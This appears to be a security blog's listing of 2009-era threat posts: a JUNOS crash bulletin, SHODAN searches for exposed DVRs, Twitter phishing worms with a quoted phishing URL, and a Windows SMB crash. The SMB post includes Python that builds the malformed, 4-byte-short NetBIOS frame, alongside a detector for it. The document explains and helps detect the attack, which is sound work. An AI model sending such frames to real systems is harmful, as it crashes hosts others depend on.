Category: Threats

JUNOS (Juniper) Flaw Exposes Core Routers to Kernel Crash


A report was received from Juniper at 4:25pm under bulletin PSN-2010-01-623 stating that a crafted, malformed option in the TCP header of a packet will cause the JUNOS kernel to core (crash).

IP Surveillance DVR.

SHODAN: Cracking IP Surveillance DVR

We have continued to play around with the SHODAN Computer Search Engine after first looking at it last week. We keep identifying the kinds of devices we sometimes note on security engagements (usually on internal networks) that should not be externally accessible and that are either still using factory default credentials or require no credentials at all to reach their administrative interfaces. Accessing the administrative panels of these devices would allow a bad actor to further compromise the organization running the device on its network. We can confirm that we are seeing results not just for poorly configured home offices or small businesses, but for large and medium businesses that would suffer significant harm if breached or if their devices were tampered with. We’ll continue to blog about our findings until we get bored with it. Today’s search demonstrates how we found a few hundred accessible interfaces for IP camera DVR surveillance systems.

You’ve been SHODAN’d


IT administrators responsible for servers whose listening services show up in the search results of the new SHODAN Computer Search Engine should pray that the ethical restraint of those ‘shodanning’ (the counterpart of googling?) remains intact. Better still, they should start implementing countermeasures (close unnecessary ports, and so on).

Remote SMB Exploit: Crashing Windows 7 and Server 2008


Python code was posted today by Laurent Gaffie on his blog, demonstrating a far too easy way to remotely crash a Windows 7 or Windows Server 2008 machine. The crash is triggered by sending a NetBIOS session header that declares the SMB packet to be 4 bytes smaller or larger than it actually is. In the code sample in the post, you can see that the header sets the packet length to 0x9a rather than 0x9e (4 bytes smaller).
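To make the length mismatch concrete, here is an added example (not Gaffie's code and not reproduced from the post) that builds a minimal SMB1 Negotiate Protocol request, wraps it in a NetBIOS Session Service header whose declared length can be deliberately set 4 bytes short, and parses the result back to flag the discrepancy. The SMB header bytes and dialect list are constructed here as a plausible negotiate request, not the exact bytes from the post; nothing is sent on the wire.

```python
import struct
from typing import Optional

# Constructed sample dialect list for an SMB1 NEGOTIATE request.
# Assumption: a typical client list; the post's exact bytes are not reproduced.
SMB_DIALECTS = [
    b"PC NETWORK PROGRAM 1.0",
    b"LANMAN1.0",
    b"Windows for Workgroups 3.1a",
    b"LM1.2X002",
    b"LANMAN2.1",
    b"NT LM 0.12",
]


def smb1_negotiate_request() -> bytes:
    """Build an SMB1 NEGOTIATE request: 32-byte SMB header, WordCount=0,
    ByteCount, then the dialect list (each entry is 0x02 + name + NUL)."""
    header = (
        b"\xffSMB"             # protocol identifier
        + b"\x72"              # SMB_COM_NEGOTIATE
        + b"\x00\x00\x00\x00"  # NT status
        + b"\x18"              # Flags
        + b"\x53\xc8"          # Flags2 (little-endian 0xc853)
        + b"\x00\x00"          # PIDHigh
        + b"\x00" * 8          # SecurityFeatures (signature)
        + b"\x00\x00"          # Reserved
        + b"\x00\x00"          # TID
        + b"\xff\xfe"          # PIDLow
        + b"\x00\x00"          # UID
        + b"\x00\x00"          # MID
    )
    assert len(header) == 32
    dialects = b"".join(b"\x02" + d + b"\x00" for d in SMB_DIALECTS)
    # WordCount (0) followed by little-endian ByteCount and the dialect bytes.
    return header + b"\x00" + struct.pack("<H", len(dialects)) + dialects


def netbios_session_message(payload: bytes, declared_len: Optional[int] = None) -> bytes:
    """Wrap an SMB message in a NetBIOS Session Service header: one type byte
    (0x00 = session message) followed by a 24-bit big-endian length.
    declared_len overrides the real length; a value 4 bytes off from the true
    length is the condition the post describes as crashing the target."""
    length = len(payload) if declared_len is None else declared_len
    if not 0 <= length <= 0xFFFFFF:
        raise ValueError("length does not fit in 24 bits")
    return b"\x00" + length.to_bytes(3, "big") + payload


def check_session_message(frame: bytes) -> dict:
    """Parse the NetBIOS header of a captured frame and compare the declared
    length with the number of bytes actually present after the header.
    Returns a dict that a detection rule or fuzzing harness can assert on."""
    if len(frame) < 4:
        raise ValueError("truncated NetBIOS session header")
    declared = int.from_bytes(frame[1:4], "big")
    actual = len(frame) - 4
    return {
        "type": frame[0],
        "declared": declared,
        "actual": actual,
        "delta": declared - actual,   # -4 for the "4 bytes smaller" case
        "mismatch": declared != actual,
    }


if __name__ == "__main__":
    smb = smb1_negotiate_request()
    well_formed = netbios_session_message(smb)
    four_short = netbios_session_message(smb, declared_len=len(smb) - 4)
    for label, frame in (("well-formed", well_formed), ("declared 4 short", four_short)):
        print(label, check_session_message(frame))
```

The same `check_session_message` logic, applied to reassembled TCP 445 stream data, is a cheap way to spot this class of malformed frame in traffic before it reaches a vulnerable host.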

A Festi-vous for the Rest of Us


On Thursday, Darren Lewis of MessageLabs, the venerable e-mail security firm now owned by Symantec, published findings on a new botnet called Festi, which rocketed into a top ten spot in the rankings of the largest spam-sending botnets in September. First classified in August, Festi reached a high-water mark in September of around three billion spam messages sent per day.

Senate Candidate Rubio discusses colon cleanser.

Sir, the floor wishes to hear no more about your colon.

The Twitter worm/twishing attack of the other day has caught some interesting casualties in its net, most notably Marco Rubio, a former Speaker of the Florida House of Representatives and a viable candidate for one of Florida’s Senate seats in 2010, and Zach Wamp, a candidate for Governor of Tennessee and a 14-year U.S. congressional representative.

Phishing site found when you click on the tweeted URL.

A twitter “worm’s” brilliant variation

A new Twitter worm is being reported making the rounds this morning; it is actually an expertly crafted variant of the worm we reported on September 24th. The variant has changed the direct message from “ROFL, this you on here?” to “hi. this you on here?”. The bad actor in China has also used a new URL, but with the same fake Twitter login landing page, identifiable by the stray angle bracket “>” following the line under ‘Sign in to Twitter’. This small change in wording will likely net a fresh batch of captured Twitter credentials.

"It looked pretty legitimate" - FBI Director Robert Mueller

Operation Phish Phry

A phish phry is a social gathering, and early Wednesday the FBI, the US Attorney’s Office, the LA Electronic Crimes Task Force, and Egyptian authorities began arranging the largest gathering of suspects indicted in connection with a single phishing scam to date. Dubbed “Operation Phish Phry”, this two-year inter-agency, inter-country investigation is rounding up 100 suspects, including 53 from North Carolina, Las Vegas, and Los Angeles, as well as 47 in Egypt, accused of stealing more than a million dollars from two U.S. banks.

The phishing site's Twitter login screen.

ROFL this you on here? The latest Twitter Worm

At 2pm on Wednesday 9/24, wide-scale reports started showing up on Twitter of a new Twitter worm that sends you a direct message with the content “rofl this you on here? http://videos.twitter.secure-logins01.com”. The link opens a Twitter-style login page (Twitter’s previous version of that page; they have since rolled out a new one) which, apart from being an old version and containing a stray angle bracket, is convincing. Upon logging in, the user’s credentials are stolen, and presumably direct messages are then sent to each of that user’s followers.
